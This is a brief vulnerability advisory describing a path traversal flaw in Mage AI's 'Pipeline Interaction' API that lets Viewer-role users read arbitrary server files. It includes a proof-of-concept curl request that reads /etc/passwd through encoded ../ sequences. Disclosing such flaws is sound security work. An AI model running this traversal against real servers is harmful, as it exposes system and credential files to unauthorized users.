Mage AI pipeline interaction request remote arbitrary file leak
mage-ai
(,)
Mage AI allows remote users with the "Viewer" role to leak arbitrary files from the Mage server due to a path traversal in the "Pipeline Interaction" request
curl -X GET
'http://localhost:6789/api/pipelines/example_pipeline/interaction/..%2F..%2F..%2
F..%2Fetc%2Fpasswd?api_key=<USER API KEY>' -H 'Authorization: Bearer
<USER TOKEN>'
No mitigations are supplied for this issue
No references are supplied for this issue